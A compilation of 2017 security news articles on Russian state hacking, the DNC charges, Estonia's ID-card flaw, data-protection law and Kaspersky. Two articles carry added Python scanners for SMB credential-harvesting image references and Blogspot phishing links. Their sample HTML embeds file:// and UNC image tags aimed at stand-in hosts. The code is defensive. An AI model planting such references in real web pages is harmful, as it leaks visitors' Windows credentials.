US DoJ Identifies at least 6 Russian Government officials Involved in DNC hack
4.1.2017 securityaffairs BigBrothers

The United States Department of Justice has gathered evidence to charge at least six Russian government officials involved in the 2016 DNC hack.
The United States Department of Justice has gathered evidence to charge at least six Russian government officials involved in the DNC hack during the 2016 Presidential election.

In the past months, US intelligence blamed Russia for cyberattacks aimed at influencing the 2016 Presidential Election in Donald Trump’s favour.

An FBI-DHS JAR report released in December 2016 implicated the Russian hacking groups APT28 and APT29 in attacks against the 2016 Presidential Election.

Security experts from Mandiant who analyzed the cyber attacks also linked the hack to a cyber espionage campaign associated with the APT28 group.

Now, the Wall Street Journal reported that United States federal prosecutors could bring charges against the alleged unnamed Russian officials early next year.

“The Justice Department has identified more than six members of the Russian government involved in hacking the Democratic National Committee’s computers and swiping sensitive information that became public during the 2016 presidential election, according to people familiar with the investigation.” wrote the Wall Street Journal.

The identities of the six suspects are yet to be revealed.

The US federal intelligence investigators believe that the Russian Government conducted a larger campaign that involved “dozens” of other Russian officials in the DNC hack and the subsequent data leak.

They acted on a direct order from Russian President Vladimir Putin, who has always denied the allegations.

The hackers who breached the DNC computer system in 2016 leaked thousands of stolen DNC emails, including personal and sensitive emails from Hillary Clinton campaign manager John Podesta.

The sensitive information was published by the WikiLeaks website.

This is the second time in 2017 that the US Government has charged Russian officials with hacking crimes: in March 2017, the US authorities charged two former Russian FSB agents and two hackers over the 2014 Yahoo data breach that exposed 500 million Yahoo accounts.


New York State Proposes Stricter Data Protection Laws Post Equifax
3.11.2017 securityweek BigBrothers

New York State Attorney General Eric T. Schneiderman introduced new legislation Thursday, designed to protect New Yorkers from corporate data breaches like the recent Equifax breach that affected more than 145 million Americans, including 8 million New York residents. Its purpose is to increase the security of private information in a business-friendly manner.

Called the Stop Hacks and Improve Electronic Data Security Act (SHIELD Act), it was introduced by Schneiderman as a program bill, and is sponsored by Senator David Carlucci and Assemblymember Brian Kavanagh. "It's clear that New York's data security laws are weak and outdated. The SHIELD Act would help ensure these hacks never happen in the first place. It's time for Albany to act, so that no more New Yorkers are needlessly victimized by weak data security measures and criminal hackers who are constantly on the prowl," said Schneiderman.

It is worth noting that Schneiderman's SHIELD Act is not the same as Senator Markey's proposed Cyber Shield Act. A draft (PDF) of Markey's bill coincidentally became available last week. While Markey's proposal is to bake security into IoT devices, Schneiderman's proposal is to bring security to businesses through reasonable security safeguards, with new controls over breach disclosure backed by financial sanctions.

Under current New York law, companies can compile personally identifiable information (PII), but are not required to meet any data security requirements if that PII does not include a social security number -- for example, the current law does not require companies to report data breaches of username-and-password combinations, or biometric data like the fingerprint used to unlock an iPhone. The changes will be achieved through amendments to the existing General Business Law and the State Technology Law.

The SHIELD Act requires businesses to adopt "reasonable" administrative, technical, and physical safeguards for sensitive data. Its scope covers any business that holds New Yorkers' sensitive data rather than simply conducts business within New York. It expands the types of data that trigger reporting requirements, to include username-and-password combinations, biometric data, and HIPAA-covered health data.

Penalties for violation are increased. It allows the attorney general to seek civil penalties and injunctions if businesses do not provide adequate security for PII. This could be $5,000 for each violation, or up to $20 for each instance of failed notification (up to a total of $250,000).

The attempt by Schneiderman is to protect New Yorkers' personal data just as the European General Data Protection Regulation (GDPR) seeks to protect Europeans' personal information. Schneiderman, however, tries to be more business-friendly. Firstly, the penalties are much lower. Secondly, the required breach disclosure timeline is more flexible. "The disclosure shall be made in the most expedient time possible and without unreasonable delay, consistent with the legitimate needs of law enforcement..."

Thirdly, there is an explicit encryption exemption. PII is only classified as PII "when either the personal information or the data element is not encrypted or encrypted with an encryption key that has also been ACCESSED OR acquired."

Fourthly, it provides a safe harbor against attorney general enforcement for companies already compliant with the NYS DFS, Gramm-Leach-Bliley, and HIPAA regulations; and those with independent certification of compliance with ISO and NIST standards. And fifthly, it provides a flexible approach for small businesses provided they "implement and maintain reasonable safeguards that are appropriate to the size and complexity of the small business."

David Zetoony, the leader of Bryan Cave's consumer protection practice, commented, "Providing a safe harbor for companies that go above-and-beyond to certify good data security is innovative, unique, and friendly to business. It rewards businesses that go the extra mile to audit and verify compliance with an industry data security practice, removing the costs and unpredictability of government litigation. It also does not penalize smaller businesses that have good security practices, but cannot afford the significant cost of annual data security audits and certifications. This is the type of thought leadership needed to improve data security legislation across the country."

Despite these exemptions and flexibility, the SHIELD Act will enforce stronger personal data protection than has so far been required outside of the regulated New York financial institutions. The definition of a data breach is broadened to include an unauthorized person gaining access to information, while the reach of the law has been widened from companies that do business in New York to companies that hold personal information of New Yorkers.

"While the federal government drags their feet we must act to protect New Yorkers. The SHIELD Act will serve as a blueprint for NY and the rest of the nation to follow to keep Americans safe," said co-sponsor Senator David Carlucci.


US Identifies 6 Russian Government Officials Involved In DNC Hack

3.11.2017 thehackernews BigBrothers

The United States Department of Justice has reportedly gathered enough evidence to charge at least six Russian government officials for allegedly playing a role in hacking DNC systems and leaking information during the 2016 presidential race.
Earlier this year, US intelligence agencies concluded that the Russian government was behind the hack and exposure of the Democratic National Committee (DNC) emails in order to influence the 2016 presidential election in Donald Trump's favour.
Now, citing people familiar with the investigation, the Wall Street Journal reported on Thursday that United States federal prosecutors could bring charges against the alleged unnamed Russian officials early next year.
The US federal intelligence investigators also believe that "dozens" of other Russian officials may have also participated in the DNC hack, which was allegedly ordered by Russian President Vladimir Putin himself.
However, both Putin and Russian government officials have denied allegations.
The DNC computer system hack last year led to thousands of stolen DNC emails, including personal and sensitive emails from Hillary Clinton campaign manager John Podesta, appearing on the whistleblowing website WikiLeaks.
In a separate forensic investigation, FireEye's incident response arm Mandiant identified hacking tools and techniques used in the DNC hack associated with Fancy Bear—also known as APT28, Sofacy, Sednit, and Pawn Storm—a state-sponsored hacking group believed to be a unit of Russian Military Intelligence (the GRU).
U.S. federal agents and prosecutors in Washington, Pittsburgh, Philadelphia and San Francisco have been cooperating with the DNC investigation. However, none of them has revealed the actual identity of the six suspects.
However, even after being charged, the Russian officials or hackers are unlikely to be prosecuted in the United States unless they set foot on US soil, because the country has no extradition agreement with Russia.
This is the second time this year that the United States has charged Russian officials with cyber crimes.
In March 2017, the DoJ charged two Russian intelligence officers—Dmitry Aleksandrovich Dokuchaev and Igor Anatolyevich Sushchin—and two criminal hackers—Alexsey Alexseyevich Belan and Karim Baratov—in connection with the 2014 Yahoo hack that exposed about 500 million Yahoo user accounts.
However, no one has ever seen the insides of a United States courtroom.


Estonia suspends security digital certificates for up to 760,000 state-issued electronic ID-cards over Identity-Theft risk
3.11.2017 securityaffairs BigBrothers

It has happened: Estonia, one of the most cyber-savvy states, has decided to block electronic ID cards over identity-theft risk.
On Thursday, Estonia announced that it would suspend security digital certificates for up to 760,000 state-issued electronic ID-cards that use the faulty chips, to mitigate the risk of identity theft.

The decision comes after IT security researchers recently discovered a vulnerability in the chips used in the cards manufactured by the Swiss company Trub AG that opens the door to malware-based attacks.

The Prime Minister Juri Ratas announced the decision to suspend security certificates for cards until their owners download an update to patch the flaw.

“The functioning of an e-state is based on trust and the state cannot afford identity theft happening to the owner of an Estonian ID card,” explained Prime Minister Juri Ratas on Thursday.

“By blocking the certificates of the ID cards at risk, the state is ensuring the safety of the ID card,”

“As far as we currently know, there has been no instances of e-identity theft, but the threat assessment of the Police and Border Guard Board and the Information System Authority indicates that this threat has become real,”

In September, the Gemalto-owned Trub Baltic AS announced it was helping the Estonian government solve the problem.

Since October 31, all users having faulty ID cards can update their security certificates remotely and at Estonian police and border guard service points.

As of Thursday night, around 40,000 users had already updated their certificates.


Estonia is considered the most technologically advanced European country; it has used e-voting since 2005 and for this reason is nicknamed E-stonia.

Estonia has already issued 1.3 million electronic ID cards offering citizens online access to a huge number of services through the “e-government” state portal. The Estonian electronic ID cards have been manufactured by the Swiss company Trub AG and its successor Gemalto AG since 2001.

According to the Government experts, other cards based on the same faulty chips are exposed to the same cyber risk.


Russia-Linked Hackers Target Turkish Critical Infrastructure
3.11.2017 securityweek BigBrothers

A Russia-linked threat group has been targeting people associated with Turkish critical infrastructure through compromised Turkish sites, according to threat management firm RiskIQ.

Called Energetic Bear, but also known as Dragonfly and Crouching Yeti, the group has been active since at least 2010. First detailed in 2014, the threat group has been focused mainly on the energy sector in the United States and Europe.

In July, Cisco revealed that the group has used template injection in attacks aimed at energy facilities and other critical infrastructure organizations in the United States. At least a dozen power firms in the country were hit in these attacks, including the Wolf Creek nuclear facility in Kansas.

In late October, the Department of Homeland Security and Federal Bureau of Investigation issued a joint alert to warn of an attack campaign associated with the group that has been ongoing since at least May 2017. The attacks target entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors.

RiskIQ now reveals that the group leveraged a supply chain attack to compromise a website belonging to a Turkish energy company and later used the site in a watering hole attack targeting people associated with Turkish critical infrastructure.

The group injected the site with SMB credential-harvesting malware and the security researchers managed to link the infrastructure to related Turkish sites that were compromised for the same purpose.

To set up their attacks, Energetic Bear compromises websites that give them exposure to specific targets, RiskIQ explains. They used the same technique for the website of Turcas Petrol, a Turkish energy company, located at turcas.com.tr.

The URL of an image the group included on the website “redirects to a link using the file:// scheme, which forces the connection through the file protocol, which then allows the group to harvest Microsoft SMB credentials,” RiskIQ's researchers explained. The compromise appears targeted at Turcas Petrol and those close to the business, which is a tactic typically employed by Energetic Bear.

According to RiskIQ, the SMB credential harvesting host is not always directly included on the websites, but an intermediary host is typically used to redirect visitors to SMB harvesting (possibly after some filtering is done).

“Additionally, the URL format of the file requested, which in this case was turcas_icon.png, is not related to the referring website. Instead, Energetic Bear seems to use a form of tagging to correlate any possible victims and their source website. The format we observed is <tag>_icon.png and <tag>.png,” the RiskIQ team says.
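A defender-side check for the injection RiskIQ describes, added here as an example and not RiskIQ's or the threat group's code: it parses a page's automatically loaded resource references, reports any whose URL uses file:// with a remote host or a UNC path (either makes a Windows client open an SMB session to that host and offer NTLM credentials), and pulls out the `<tag>_icon.png` / `<tag>.png` correlation tag. The sample HTML, the 203.0.113.x / 198.51.100.x hosts and the `energy.png` name are constructed; `turcas_icon.png` is the name quoted in the article.

```python
r"""Find resource references in a web page that would force an SMB connection.

Added example, not RiskIQ's or the threat group's code. A Windows client that
fetches an <img>/<link>/<script> whose URL is file://host/... or a
\\host\share UNC path opens an SMB session to that host and may offer NTLM
credentials; RiskIQ describes exactly this injection on compromised Turkish
sites. The sample HTML and hosts below are constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Attributes whose value a browser fetches automatically, without a click.
RESOURCE_ATTRS = {"src", "href", "data", "poster", "background"}

# RiskIQ's observed naming: <tag>_icon.png or <tag>.png, tag = victim marker.
TAG_RE = re.compile(r"^(?P<tag>[\w-]+?)(?:_icon)?\.png$", re.IGNORECASE)


class _RefCollector(HTMLParser):
    """Collect (element, attribute, value) for every auto-fetched resource."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in RESOURCE_ATTRS and value:
                self.refs.append((tag, name, value.strip()))


def smb_target(url):
    r"""Return the remote host if fetching `url` would open an SMB session
    (file://host/... or \\host\share), else None.

    file:///local/path has no host and stays local; protocol-relative
    //host/path is ordinary HTTP(S). Neither is reported.
    """
    if url.startswith("\\\\"):
        host = url[2:].split("\\", 1)[0]
        return host or None
    parts = urlsplit(url)
    if parts.scheme == "file" and parts.netloc:
        return parts.netloc
    return None


def victim_tag(url):
    """Extract the correlation tag from <tag>_icon.png / <tag>.png, if any."""
    name = unquote(url.replace("\\", "/").rsplit("/", 1)[-1])
    match = TAG_RE.match(name)
    return match.group("tag") if match else None


def scan_html(html):
    """Return one finding per resource reference that would leak SMB creds."""
    collector = _RefCollector()
    collector.feed(html)
    findings = []
    for element, attr, url in collector.refs:
        host = smb_target(url)
        if host is None:
            continue
        findings.append({"element": element, "attr": attr, "url": url,
                         "host": host, "victim_tag": victim_tag(url)})
    return findings


# Constructed sample: a CDN stylesheet and a local logo (benign), then a
# file:// injection and a UNC injection pointing at documentation addresses.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="//cdn.example.com/site.css">
</head><body>
<img src="/images/logo.png" alt="logo">
<img src="file://203.0.113.5/s/turcas_icon.png" width="1" height="1">
<img src="\\\\198.51.100.7\\pub\\energy.png" width="1" height="1">
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"{f['element']}[{f['attr']}] -> {f['host']} "
              f"tag={f['victim_tag']} {f['url']}")
```

Run it over a crawl of your own public pages, or over proxy-captured responses, to spot an injected reference before users load it; at the network edge the complementary control is blocking outbound TCP 445 and 139, which stops the credential leak regardless of how the reference got onto the page.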

RiskIQ discovered that the threat group has compromised ‘general purpose’ websites too, such as plantengineering.com, which serves as an information and news hub for the critical infrastructure sector and which is owned by CFE Media LLC. Two other sites registered with the same email address were also compromised, namely controleng.com and csemag.com.

The security researchers believe that CFE Media’s other websites were affected as well, “because they’re geared toward engineers working in the critical infrastructure sector and thus prime targets for this watering hole attack.” They also note that the compromise campaign likely started between the beginning of February and the end of March.


Russian 'Fancy Bear' Hackers Abuse Blogspot for Phishing
3.11.2017 securityweek BigBrothers
The cyber espionage group known as Fancy Bear, which is widely believed to be backed by the Russian government, has been abusing Google’s Blogspot service in recent phishing attacks.

Threat intelligence firm ThreatConnect spotted the use of the blogging service while analyzing attacks aimed at Bellingcat, a group of investigative journalists that uses open source information to report on various events taking place around the world.

Fancy Bear, also known as Pawn Storm, APT28, Sofacy, Sednit, Strontium and Tsar Team, was first seen targeting Bellingcat in 2015 as part of a campaign aimed at entities investigating Russia’s involvement in the downing of Malaysia Airlines flight MH17 in July 2014 as it was crossing a conflict zone in Ukraine.

The latest attacks aimed at Bellingcat involved fake emails instructing users to change their Gmail passwords as a result of unauthorized activity on their account, and Dropbox invitations to view shared folders.

The buttons included in these emails pointed to a randomly generated Blogspot subdomain set up to redirect visitors to a phishing page. The phishing sites used HTTPS and they were hosted on subdomains that may have tricked many individuals into thinking they were legitimate. Experts believe the attackers likely used Blogspot in an effort to get past spam filters.

“A URL hosted on Google's own systems, in this case Blogspot, may be more likely to get past spam filters than URLs hosted on a third party IP address or hostname,” ThreatConnect researchers said in a blog post.
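A mail-triage check for the lure described above, added here as an example and not ThreatConnect's code: it extracts the links from a password-reset or share-invitation email and flags any that do not point at the impersonated brand's own domains, and separately any on shared hosting such as Blogspot, which a filter may trust as a Google property even though anyone can register a subdomain there. The brand domain lists, the `x7q2k9d1.blogspot.com` subdomain and the sample message are assumptions constructed for the example.

```python
"""Triage links in a brand-impersonation email (password reset, share invite).

Added example, not ThreatConnect's code. Flags links that do not point at the
impersonated brand's own domains and, separately, links on shared hosting
such as Blogspot, which a filter may trust as a Google property although any
sender can obtain a subdomain there. Brand domain lists and the sample
message below are assumptions constructed for the example.
"""
import email
import re
from email import policy
from urllib.parse import urlsplit

# Assumed for the example: domains a genuine notification would link to.
BRAND_DOMAINS = {
    "gmail": {"google.com"},
    "dropbox": {"dropbox.com"},
}
# Assumed: hosting where any sender can obtain an arbitrary subdomain.
SHARED_HOSTING = {"blogspot.com"}

HREF_RE = re.compile(r'href\s*=\s*"([^"]+)"', re.IGNORECASE)


def registrable(host):
    """Last two labels of a host: 'x.blogspot.com' -> 'blogspot.com'.
    Adequate for the .com hosts in this example; a public-suffix list is
    needed for country-code domains in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def extract_links(raw_message):
    """Return every href target from the HTML (or plain) body of a message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain"))
    return HREF_RE.findall(body.get_content()) if body else []


def triage(raw_message, brand):
    """Return findings for links that should not appear in a genuine email
    from `brand`; each finding carries the reasons it was flagged."""
    findings = []
    for url in extract_links(raw_message):
        host = urlsplit(url).hostname or ""
        reg = registrable(host)
        reasons = []
        if reg in SHARED_HOSTING:
            reasons.append("shared-hosting")
        if reg not in BRAND_DOMAINS[brand]:
            reasons.append("off-brand-host")
        if reasons:
            findings.append({"url": url, "host": host, "reasons": reasons})
    return findings


# Constructed sample lure: the sender looks like Google, the call-to-action
# button goes to a random Blogspot subdomain, and a second link is genuine.
SAMPLE_EMAIL = """\
From: Gmail Team <no-reply@accounts.google.com>
To: reporter@example.org
Subject: Unauthorized sign-in attempt
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<p>Someone just used your password to sign in.</p>
<p><a href="https://x7q2k9d1.blogspot.com/">Change password</a></p>
<p><a href="https://support.google.com/accounts">Learn more</a></p>
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_EMAIL, "gmail"):
        print(f"{f['host']}: {', '.join(f['reasons'])}  {f['url']}")
```

The point of the two separate reasons is that a rule allowing everything under a Google-owned domain would pass the Blogspot link; the brand check catches it because the link host is not where a real Gmail notice sends the user, and the shared-hosting check catches it even for brands whose domain list is incomplete.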

Fancy Bear is believed to be behind many high profile attacks, including a campaign that may have attempted to interfere in last year’s presidential election in the United States.

Researchers at SecureWorks reported last year that they had identified thousands of Gmail accounts targeted by the hackers. The security firm recently provided the entire list of accounts to The Associated Press, whose reporters have analyzed them in an effort to find who they belong to.

They identified the email addresses of entities in 116 countries, including former U.S. Secretaries of State John Kerry and Colin Powell, NATO Supreme Commanders Air Force Gen. Philip Breedlove and Army Gen. Wesley Clark, defense contractors such as Raytheon and Lockheed Martin, U.S. politicians and intelligence officials, Ukrainian officials and the pope’s representative in Kiev, and Russian opponents of the Kremlin.


Estonia Blocks Electronic ID Cards Over Identity-Theft Risk
3.11.2017 securityweek BigBrothers
Cyber-savvy Estonia said on Thursday it would suspend security certificates for up to 760,000 state-issued electronic ID-cards with faulty chips as of Friday midnight to mitigate the risk of identity theft.

Dubbed E-stonia for being one of the world's most wired nations, the Baltic eurozone state of 1.3 million people issues electronic ID cards giving citizens online access to virtually all public services at a special "e-government" state portal.

IT security experts recently discovered a flaw in the Swiss-made chips used in the cards that makes them vulnerable to malware.

"The functioning of an e-state is based on trust and the state cannot afford identity theft happening to the owner of an Estonian ID card," Prime Minister Juri Ratas said Thursday as he announced the decision to suspend security certificates for cards until their owners download an update to patch the flaw.

"By blocking the certificates of the ID cards at risk, the state is ensuring the safety of the ID card," Ratas said.

"As far as we currently know, there has been no instances of e-identity theft, but the threat assessment of the Police and Border Guard Board and the Information System Authority indicates that this threat has become real," he added.

Estonia has made a name for itself as a trailblazer in technology, notably pioneering e-voting in 2005 and playing host to NATO's cyber defence centre.

Estonian authorities also warned that other cards and computer systems using the chips produced by the same manufacturer were also at risk.

Since 2001 Estonian electronic ID cards have been manufactured by the Swiss company Trub AG and its successor Gemalto AG.

In September, Trub Baltic AS, which belongs to the Gemalto group, announced it was cooperating with the Estonian government on solving the problem.

As of October 31, all users of faulty ID cards can update their security certificates remotely and at Estonian police and border guard service points.

As of Thursday night around 40,000 users had already done so.


North Korea Denies Involvement in WannaCry Cyberattack
1.11.2017 securityweek BigBrothers
North Korea has slammed Britain for accusing it of being behind a global ransomware attack that hit the National Health Service, calling the allegation a "wicked attempt" to further tighten international sanctions against Pyongyang.

A third of Britain's public hospitals were affected by the WannaCry worm in May, according to a government report.

Up to 300,000 computers in 150 countries were hit by WannaCry, which seized systems and demanded payment in Bitcoin to return control to users.

Some researchers have pointed the finger at Pyongyang, saying that the code used was similar to past hacks blamed on Kim Jong-Un's regime.

British Home Office minister Ben Wallace told the BBC last week that London was "as sure as possible" that North Korea was responsible.

But a spokesman for the North's Korea-Europe Association denied the accusations and warned Britain against "groundless speculation".

"This is an act beyond the limit of our tolerance and it makes us question the real purpose behind the UK's move," he said, in a statement carried by the official Korean Central News Agency late Monday.

"The moves of the UK government to doggedly associate the DPRK with the cyberattack cannot be interpreted in any other way than a wicked attempt to lure the international community into harboring greater mistrust of the DPRK," the spokesman said, using the initials of the North's official name.

According to the South Korean government, the North has a 6,800-strong unit of trained cyberwarfare specialists. It has been accused of launching high-profile cyberattacks, including the 2014 hacking of Sony Pictures.

Experts say the North appears to have stepped up cyberattacks in recent years in a bid to earn hard foreign currency in the face of tougher United Nations sanctions imposed over its nuclear and missile programs.


VPN Law Latest Step in Kremlin Online Crackdown: Experts
30.10.2017 securityweek BigBrothers
A law coming into force on Wednesday will give the Kremlin greater control over what Russians can access online ahead of a presidential election next March.

Providers of virtual private networks (VPNs) -- which let internet users access sites banned in one country by making it appear that they are browsing from abroad -- will be required to block websites listed by the Russian state communications watchdog.

The law is the latest in a raft of restrictions introduced by President Vladimir Putin's government and is expected to affect journalists and opposition activists, even though several VPN providers say they will not comply.

Videos by the punk band Pussy Riot and the blog of opposition leader Alexei Navalny have in the past been blocked under a law that allows authorities to blacklist websites they consider extremist.

"Journalists and activists who are using this to put out messages anonymously will be affected," Eva Galperin, director of cybersecurity at the US-based Electronic Frontier Foundation, told AFP.

Even if they are able to work around the new restrictions, the law will send a powerful message to activists, she said.

"If you're thinking about taking the steps that you need to stay anonymous from the government, you think maybe it's not worth it."

The law will likely be selectively applied and will probably not affect foreign business people using company VPNs, she said.

The measure is part of a wider crackdown on online communications, which this month saw the popular messaging app Telegram fined for failing to register with the Roskomnadzor communications watchdog and to provide the FSB with information on user interactions.

Starting from 2018, companies on the Roskomnadzor register must also store all the data of Russian users inside the country, according to anti-terror legislation which was passed last year and decried by the opposition and internet companies.

On Thursday, the Russian parliament's lower house approved a draft law that would let the attorney general blacklist the websites of "undesirable organisations" without a court order.

- 'Less safe, less free' -

While falling short of a blanket ban on virtual private networks, the new law undermines one of their key purposes and "essentially asks VPN services to help enforce Russia's censorship regime", Harold Li, vice president at ExpressVPN International, told AFP by email.

"VPNs are central to online privacy, anonymity, and freedom of speech, so these restrictions represent an attack on digital rights," Li said.

"We hope and expect that most major VPN services will not bend to these new restrictions."

Providers ZenMate and Private Internet Access -- which said it removed all of its servers from Russia in 2016 after several of them were seized by authorities without notification -- have already announced that they would not enforce the list of banned websites.

Companies that do not comply are likely to see their own websites placed on the Russian blacklist.

Amnesty International has called the new legislation "a major blow to internet freedom" and Edward Snowden, the NSA whistleblower who lives in Russia, said the measure "makes Russia both less safe and less free".

Laws curbing internet freedoms were drafted following mass protests in 2011 and 2012 against Putin over disputed election results.

The new measures come into force ahead of presidential elections next March, when Putin is widely expected to extend his grip on power to 2024.

Russia's opposition groups rely heavily on the internet to make up for their lack of access to the mainstream media.

- 'Complete control' -

"The path that Russia chose four years ago is founded on the concept of digital sovereignty," said Sarkis Darbinyan, lawyer and director of the Digital Rights Centre.

"It's the idea that the government should control the domestic part of the internet. Western countries do not support this concept and so what we are seeing today is an Asian-style development of the internet," along the lines of China and Iran, he said.

But Galperin of the Electronic Frontier Foundation noted that even if the Kremlin's end goal is "complete control of communications on the internet", its technical capabilities still lag way behind China with its "Great Firewall".

Many of the invasive measures pushed by the Kremlin are comparable with the snooping powers demanded by Western governments, she said.

"Russia will frequently point to the fact that the FBI and (British Prime Minister) Theresa May want these powers as reasons why they should have them, and why they're compatible with human rights."


Moving Target Defense Startup Cryptonite Emerges From Stealth
26.10.2017 securityweek BigBrothers
Cryptonite, a Rockville, Maryland-based startup that aims to prevent reconnaissance and lateral movement in the network using moving target defense and micro-segmentation technologies, has emerged from stealth mode.

The company’s product, the CryptoniteNXT network appliance, implements what is known as a Zero Trust environment, which is achieved by minimizing access to resources and visibility within the network to the absolute minimal subset needed by users to carry out their job.

CryptoniteNXT, which sits between the perimeter firewall and the organization’s internal wired and wireless networking devices (i.e. switches and wireless access points), uses a concept known as moving target defense (MTD) to make systems “invisible.”

The MTD technology, implemented by a CryptoniteNXT component named Net Guard, aims to prevent an attacker who already has access from mapping the network and finding vulnerable systems that they could exploit. This solution can also provide protection against insiders and malicious actors who are already on the network when the product is deployed, as previously collected network maps become unusable.

“CryptoniteNXT Net Guard does this by transforming the endpoint’s view of the network into a dynamic, abstract structure, in effect making the once static network into a dynamic moving target,” Cryptonite said. “Net Guard MTD creates a mapping from the obfuscated network to the real network to enable the flow of traffic across the traditional network infrastructure.”

In order to restrict lateral movement within the network, CryptoniteNXT uses a component named Micro Shield Segmentation. This ensures that users only have visibility into the machines needed to do their job, preventing malicious insiders and attackers from moving freely across the network.

Cryptonite says the product and the Zero Trust environment it creates can be used to address a wide range of risks, including ones associated with the lack of updates and patches, insecure IoT devices, and mobile devices.

Initial research and development into Cryptonite’s MTD technology was funded by the U.S. Department of Homeland Security (DHS) and the Department of Defense (DoD).

Cryptonite, a spin-off of Maryland defense contractor Intelligent Automation (IAI), is led by President and CEO Michael Simon, and Justin Yackoski, CTO and former lead researcher at IAI.

Cryptonite is backed by several investors, including Tenable founder Ron Gula; David Walker, founder of Pangia Technologies; Al Nardslico, founder of SMS; Abtin Buergari, founder of Modus eDiscovery; Don Rogers, co-founder of Shulman Rogers; and Dr. Leonard Haynes, co-founder of IAI.


Kaspersky May Have Found How Russian Hackers Stole NSA Data
25.10.2017 securityweek BigBrothers
Security firm Kaspersky Lab has shared preliminary results from its investigation following media reports that Russian hackers used its software to steal sensitive NSA data from a contractor’s computer back in 2015.

The Wall Street Journal reported earlier this month that a threat group working for the Russian government stole information on how the U.S. hacks foreign networks and how it defends against cyberattacks. The files were allegedly taken in 2015 from the personal computer of an NSA contractor who had been using a security product from Kaspersky Lab.

The article suggested that Kaspersky either knowingly helped the Russian government obtain the files or that the hackers exploited vulnerabilities in the company’s software without the firm knowing about the attack.

Kaspersky immediately launched an internal investigation into the matter and it has now shared preliminary results.

Kaspersky revealed in June 2015 that its own systems had been breached as part of an attack involving Duqu 2.0 malware, which has been linked to Israeli intelligence. The company’s latest investigation has found no evidence of additional intrusions.

As for the 2015 event reported by WSJ, the starting point of Kaspersky’s investigation is an APT-related incident that occurred in 2014. At the time, the company’s systems detected what appeared to be source code for malware used by the Equation Group, a threat actor believed to be associated with the NSA. At this point, the firm had not made its Equation Group research available to the public.

A Kaspersky home product had detected what appeared to be new Equation Group malware samples on a device in the United States. The antivirus had been configured to automatically send new malware samples back to the company for analysis.

The user in question later intentionally downloaded malware-laden piracy software, specifically a Microsoft Office key generator, and temporarily disabled the Kaspersky product on the machine as it would have prevented the installation of the tool. The malware, detected as Backdoor.Win32.Mokes.hvl, remained on the device for an unspecified period and it opened a backdoor on the system, giving hackers easy access to the computer.

When the antivirus was re-enabled, it detected both Backdoor.Win32.Mokes.hvl and other pieces of malware linked to the Equation Group. One of the files, a 7zip archive, was automatically sent to Kaspersky Lab for analysis, but the company’s CEO, Eugene Kaspersky, ordered the removal of the files from all systems after determining that it was Equation malware source code. The files were not shared with third parties before being deleted, Kaspersky said.

According to the company, no other malware was detected by its products on that device in 2015. After the activities of the Equation Group were made public by the company in February 2015, Equation Group malware was detected on several other IPs in the same range as the initial infection, but the devices appeared to be configured as honeypots and Kaspersky said it did not process the detections in any special way.

The company said it did not detect any other related incident since. It also claimed that an analysis of its software confirmed that it had not created any detection rules for non-malicious documents containing keywords such as “classified” or “top secret” – this aims to reinforce its initial statement that it does not intentionally spy for the Russian government.

Kaspersky also pointed out that it routinely informs the U.S. government about active APT attacks detected in the country.

“We believe the above is an accurate analysis of this incident from 2014. The investigation is still ongoing, and the company will provide additional technical information as it becomes available,” Kaspersky said.

Several recent media reports focused on Kaspersky’s alleged connection to the Kremlin, which has led to many U.S. officials raising concerns regarding the use of the company’s products. Last month, the Department of Homeland Security (DHS) ordered all government agencies to identify and remove the firm’s security products.

In an effort to clear its name, Kaspersky announced the launch of a new transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.


Microsoft Drops Lawsuit as U.S. Govt Limits Use of Gag Orders
24.10.2017 securityweek BigBrothers
Microsoft is dropping a lawsuit against the US government after the Department of Justice issued new rules limiting the use of secrecy orders that prevent firms from telling customers law enforcement has accessed their data.

The tech giant sued the government in April last year, but declared victory Monday and said it was ending its case after the DOJ announced it would revise its rules.

Brad Smith, Microsoft's chief legal officer, said the company had achieved "an unequivocal win for our customers" that protected the constitutional rights of US citizens.

"Until now, the government routinely sought and obtained orders requiring email providers to not tell our customers when the government takes their personal email or records," he wrote in a blog post.

"Sometimes these orders don't include a fixed end date, effectively prohibiting us forever from telling our customers that the government has obtained their data."

Smith acknowledged that secrecy orders were sometimes required for legitimate reasons -- such as protecting individuals at risk from harm or ensuring an investigation was not thwarted.

But, he added, at the time the lawsuit was filed, "the government appeared to be overusing secrecy orders in a routine fashion - even where the specific facts didn't support them".

"When we filed our case we explained that in an 18-month period, 2,576 of the legal demands we received from the U.S. government included an obligation of secrecy, and 68 percent of these appeared to be indefinite demands for secrecy," he said.

But in a memo issued last week, Deputy Attorney General Rod Rosenstein said any such gag order "should have an appropriate factual basis" and "should extend only as long as necessary to satisfy the government's interest".

While lauding the DOJ's decision, Microsoft repeated its call on US Congress to amend the 1986 Electronic Communications Privacy Act that regulates government access to contemporary electronic communications.

It comes as the US Supreme Court last week announced it would hear a separate privacy case that pits the Trump administration against Microsoft.

The case examines whether US law enforcement should be allowed to access evidence held on servers overseas during an investigation.

It comes after Microsoft refused to hand over emails during a US drug trafficking investigation on the basis the police's warrant did not extend to Ireland, where the messages were stored.


Kaspersky Opens Antivirus Source Code for Independent Review to Rebuild Trust
24.10.2017 thehackernews  BigBrothers

Kaspersky Lab — We have nothing to hide!
Russia-based Antivirus firm hits back with what it calls a "comprehensive transparency initiative," to allow independent third-party review of its source code and internal processes to win back the trust of customers and infosec community.
Kaspersky launches this initiative days after it was accused of helping, knowingly or unknowingly, Russian government hackers to steal classified material from a computer belonging to an NSA contractor.
Earlier this month another story published by the New York Times claimed that Israeli government hackers hacked into Kaspersky’s network in 2015 and caught Russian hackers red-handed hacking US government with the help of Kaspersky.
US officials have long been suspicious that Kaspersky antivirus firm may have ties to Russian intelligence agencies.
Back in July, the company offered to turn over the source code for the U.S. government to audit.
